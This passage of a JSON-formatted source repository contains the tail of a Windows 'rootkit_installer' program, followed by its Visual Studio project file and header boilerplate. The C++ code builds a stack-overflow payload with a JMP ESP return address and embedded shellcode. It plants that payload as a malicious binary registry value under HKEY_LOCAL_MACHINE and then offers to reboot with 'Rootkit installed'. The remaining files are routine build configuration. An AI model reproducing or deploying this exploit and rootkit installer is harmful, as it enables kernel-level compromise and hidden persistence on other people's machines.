Code);\r\n        }        \r\n        else\r\n        {\r\n            DbgMsg(__FILE__, __LINE__, \"[+] 
SUCCESS\\n\");\r\n        }\r\n\r\n        RegCloseKey(hKey);\r\n    }\r\n    else\r\n    {\r\n        DbgMsg(__FILE__, __LINE__, \"RegOpenKey() ERROR %d\\n\", Code);\r\n    }\r\n\r\n    DWORD dwDataSize = BOF_MIN_LENGTH + dwShellcodeSize_1;\r\n    PVOID pData = malloc(dwDataSize);\r\n    if (pData)\r\n    {\r\n        *(PDWORD)((PUCHAR)pData + BOF_RET_OFFSET) = JMP_ESP_ADDR;        \r\n        memcpy((PUCHAR)pData + BOF_MIN_LENGTH, Shellcode_1, dwShellcodeSize_1);\r\n\r\n        if (*((PUCHAR)pData + BOF_MIN_LENGTH) == 0xcc && !m_DebugBreaks)\r\n        {\r\n            // remove debug break\r\n            *((PUCHAR)pData + BOF_MIN_LENGTH) = 0x90;\r\n        }\r\n\r\n        ScWriteDword(\r\n            (PUCHAR)pData + BOF_MIN_LENGTH, dwShellcodeSize_1,\r\n            marker_MmIsAddressValid, offset_MmIsAddressValid\r\n        );\r\n\r\n        DbgMsg(__FILE__, __LINE__, \"[+] Adding malicious data for value \\\"%s\\\\%s\\\"...\\n\", EXPL_KEY, EXPL_VAL);\r\n\r\n        Code = RegOpenKey(HKEY_LOCAL_MACHINE, EXPL_KEY, &hKey);\r\n        if (Code == ERROR_SUCCESS)\r\n        {\r\n            // set malicious value\r\n            Code = RegSetValueEx(hKey, EXPL_VAL, 0, REG_BINARY, (PBYTE)pData, dwDataSize);\r\n            if (Code != ERROR_SUCCESS)\r\n            {\r\n                DbgMsg(__FILE__, __LINE__, \"RegSetValueEx() ERROR %d\\n\", Code);\r\n            }        \r\n            else\r\n            {\r\n                DbgMsg(__FILE__, __LINE__, \"[+] SUCCESS\\n\");\r\n\r\n                if (MessageBox(\r\n                    0, \r\n                    \"Rootkit installed, rebot the box now?\", \r\n                    \"SUCCESS\", \r\n                    MB_ICONINFORMATION | MB_YESNO) == IDYES)\r\n                {\r\n                    // reboot the system\r\n                    LoadPrivileges(SE_SHUTDOWN_NAME);\r\n                    ExitWindowsEx(EWX_REBOOT, SHTDN_REASON_MAJOR_APPLICATION);\r\n                    return 0;\r\n                }           
     \r\n            }\r\n\r\n            RegCloseKey(hKey);\r\n        }\r\n        else\r\n        {\r\n            DbgMsg(__FILE__, __LINE__, \"RegOpenKey() ERROR %d\\n\", Code);\r\n        }\r\n\r\n        free(pData);\r\n    }\r\n\r\nend:\r\n    printf(\"Press any key to quit...\\n\");\r\n    _getch();\r\n\r\n\treturn 0;\r\n}\r\n//--------------------------------------------------------------------------------------\r\n// EoF\r\n"
  },
  {
    "path": "src/rootkit_installer/rootkit_installer.vcproj",
    "content": "<?xml version=\"1.0\" encoding=\"windows-1251\"?>\r\n<VisualStudioProject\r\n\tProjectType=\"Visual C++\"\r\n\tVersion=\"9,00\"\r\n\tName=\"rootkit_installer\"\r\n\tProjectGUID=\"{8A5187B5-EA41-4C34-8D5B-4213A281AAFB}\"\r\n\tRootNamespace=\"rootkit_installer\"\r\n\tKeyword=\"Win32Proj\"\r\n\tTargetFrameworkVersion=\"196613\"\r\n\t>\r\n\t<Platforms>\r\n\t\t<Platform\r\n\t\t\tName=\"Win32\"\r\n\t\t/>\r\n\t</Platforms>\r\n\t<ToolFiles>\r\n\t</ToolFiles>\r\n\t<Configurations>\r\n\t\t<Configuration\r\n\t\t\tName=\"Debug|Win32\"\r\n\t\t\tOutputDirectory=\"$(SolutionDir)$(ConfigurationName)\"\r\n\t\t\tIntermediateDirectory=\"$(ConfigurationName)\"\r\n\t\t\tConfigurationType=\"1\"\r\n\t\t\tCharacterSet=\"2\"\r\n\t\t\t>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCPreBuildEventTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCCustomBuildTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCXMLDataGeneratorTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCWebServiceProxyGeneratorTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCMIDLTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCCLCompilerTool\"\r\n\t\t\t\tAdditionalOptions=\"/D &quot;DBG&quot; /D 
&quot;USE_SHELLCODE_DEBUGBREAK&quot;\"\r\n\t\t\t\tOptimization=\"0\"\r\n\t\t\t\tPreprocessorDefinitions=\"WIN32;_DEBUG;_CONSOLE\"\r\n\t\t\t\tMinimalRebuild=\"true\"\r\n\t\t\t\tBasicRuntimeChecks=\"0\"\r\n\t\t\t\tRuntimeLibrary=\"0\"\r\n\t\t\t\tUsePrecompiledHeader=\"2\"\r\n\t\t\t\tWarningLevel=\"3\"\r\n\t\t\t\tDebugInformationFormat=\"3\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCManagedResourceCompilerTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCResourceCompilerTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCPreLinkEventTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCLinkerTool\"\r\n\t\t\t\tOutputFile=\"$(OutDir)\\..\\..\\bin\\$(ProjectName).exe\"\r\n\t\t\t\tLinkIncremental=\"1\"\r\n\t\t\t\tGenerateManifest=\"false\"\r\n\t\t\t\tUACExecutionLevel=\"1\"\r\n\t\t\t\tGenerateDebugInformation=\"true\"\r\n\t\t\t\tSubSystem=\"1\"\r\n\t\t\t\tTargetMachine=\"1\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCALinkTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCManifestTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCXDCMakeTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCBscMakeTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCFxCopTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCAppVerifierTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCPostBuildEventTool\"\r\n\t\t\t/>\r\n\t\t</Configuration>\r\n\t\t<Configuration\r\n\t\t\tName=\"Release|Win32\"\r\n\t\t\tOutputDirectory=\"$(SolutionDir)$(ConfigurationName)\"\r\n\t\t\tIntermediateDirectory=\"$(ConfigurationName)\"\r\n\t\t\tConfigurationType=\"1\"\r\n\t\t\tCharacterSet=\"1\"\r\n\t\t\tWholeProgramOptimization=\"1\"\r\n\t\t\t>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCPreBuildEventTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCCustomBuildTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCXMLDataGeneratorTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCWebServiceProxyGeneratorTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCMIDLTool\"\r\n\t\t\t/>\r\n\t\t\t<Too
l\r\n\t\t\t\tName=\"VCCLCompilerTool\"\r\n\t\t\t\tOptimization=\"2\"\r\n\t\t\t\tEnableIntrinsicFunctions=\"true\"\r\n\t\t\t\tPreprocessorDefinitions=\"WIN32;NDEBUG;_CONSOLE\"\r\n\t\t\t\tRuntimeLibrary=\"2\"\r\n\t\t\t\tEnableFunctionLevelLinking=\"true\"\r\n\t\t\t\tUsePrecompiledHeader=\"2\"\r\n\t\t\t\tWarningLevel=\"3\"\r\n\t\t\t\tDebugInformationFormat=\"3\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCManagedResourceCompilerTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCResourceCompilerTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCPreLinkEventTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCLinkerTool\"\r\n\t\t\t\tLinkIncremental=\"1\"\r\n\t\t\t\tGenerateDebugInformation=\"true\"\r\n\t\t\t\tSubSystem=\"1\"\r\n\t\t\t\tOptimizeReferences=\"2\"\r\n\t\t\t\tEnableCOMDATFolding=\"2\"\r\n\t\t\t\tTargetMachine=\"1\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCALinkTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCManifestTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCXDCMakeTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCBscMakeTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCFxCopTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCAppVerifierTool\"\r\n\t\t\t/>\r\n\t\t\t<Tool\r\n\t\t\t\tName=\"VCPostBuildEventTool\"\r\n\t\t\t/>\r\n\t\t</Configuration>\r\n\t</Configurations>\r\n\t<References>\r\n\t</References>\r\n\t<Files>\r\n\t\t<Filter\r\n\t\t\tName=\"Source 
Files\"\r\n\t\t\tFilter=\"cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx\"\r\n\t\t\tUniqueIdentifier=\"{4FC737F1-C7A5-4376-A066-2A32D752A2FF}\"\r\n\t\t\t>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\"..\\common\\debug.cpp\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\rootkit_installer.cpp\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\stdafx.cpp\"\r\n\t\t\t\t>\r\n\t\t\t\t<FileConfiguration\r\n\t\t\t\t\tName=\"Debug|Win32\"\r\n\t\t\t\t\t>\r\n\t\t\t\t\t<Tool\r\n\t\t\t\t\t\tName=\"VCCLCompilerTool\"\r\n\t\t\t\t\t\tUsePrecompiledHeader=\"1\"\r\n\t\t\t\t\t/>\r\n\t\t\t\t</FileConfiguration>\r\n\t\t\t\t<FileConfiguration\r\n\t\t\t\t\tName=\"Release|Win32\"\r\n\t\t\t\t\t>\r\n\t\t\t\t\t<Tool\r\n\t\t\t\t\t\tName=\"VCCLCompilerTool\"\r\n\t\t\t\t\t\tUsePrecompiledHeader=\"1\"\r\n\t\t\t\t\t/>\r\n\t\t\t\t</FileConfiguration>\r\n\t\t\t</File>\r\n\t\t</Filter>\r\n\t\t<Filter\r\n\t\t\tName=\"Header Files\"\r\n\t\t\tFilter=\"h;hpp;hxx;hm;inl;inc;xsd\"\r\n\t\t\tUniqueIdentifier=\"{93995380-89BD-4b04-88EB-625FBE52EBFB}\"\r\n\t\t\t>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\"..\\common\\catchy32.h\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\"..\\common\\common.h\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\"..\\common\\debug.h\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\"..\\common\\ntdll_defs.h\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\"..\\common\\shellcode2_struct.h\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\stdafx.h\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\".\\targetver.h\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t\t<File\r\n\t\t\t\tRelativePath=\"..\\common\\undocnt.h\"\r\n\t\t\t\t>\r\n\t\t\t</File>\r\n\t\t</Filter>\r\n\t\t<Filter\r\n\t\t\tName=\"Resource 
Files\"\r\n\t\t\tFilter=\"rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav\"\r\n\t\t\tUniqueIdentifier=\"{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}\"\r\n\t\t\t>\r\n\t\t</Filter>\r\n\t</Files>\r\n\t<Globals>\r\n\t</Globals>\r\n</VisualStudioProject>\r\n"
  },
  {
    "path": "src/rootkit_installer/stdafx.cpp",
    "content": "// stdafx.cpp : source file that includes just the standard includes\r\n// win32k_FontLinkDefaultChar.pch will be the pre-compiled header\r\n// stdafx.obj will contain the pre-compiled type information\r\n\r\n#include \"stdafx.h\"\r\n\r\n// TODO: reference any additional headers you need in STDAFX.H\r\n// and not in this file\r\n"
  },
  {
    "path": "src/rootkit_installer/stdafx.h",
    "content": "#pragma once\r\n\r\n#include \"targetver.h\"\r\n\r\n#include <stdio.h>\r\n#include <tchar.h>\r\n#include <conio.h>\r\n#include <windows.h>\r\n\r\n#define USE_SHELLCODE_DBGPRINT\r\n#define USE_DEBUG_DRIVER\r\n\r\n#include \"../common/common.h\"\r\n#include \"../common/ntdll_defs.h\"\r\n#include \"../common/undocnt.h\"\r\n#include \"../common/debug.h\"\r\n#include \"../common/catchy32.h\"\r\n\r\n#include \"../common/shellcode2_struct.h\"\r\n\r\n#pragma comment(lib, \"../common/catchy32.lib\")\r\n"
  },
  {
    "path": "src/rootkit_installer/targetver.h",
    "content": "#pragma once\r\n\r\n// The following macros define the minimum required platform.  The minimum required platform\r\n// is the earliest version of Windows, Internet Explorer etc. that has the necessary features to run \r\n// your application.  The macros work by enabling all features available on platform versions up to and \r\n// including the version specified.\r\n\r\n// Modify the following defines if you have to target a platform prior to the ones specified below.\r\n// Refer to MSDN for the latest info on corresponding values for different platforms.\r\n#ifndef _WIN32_WINNT            // Specifies that the minimum required platform is Windows Vista.\r\n#define _WIN32_WINNT 0x0600     // Change this to the appropriate value to target other versions of Windows.\r\n#endif\r\n\r\n"
  }
]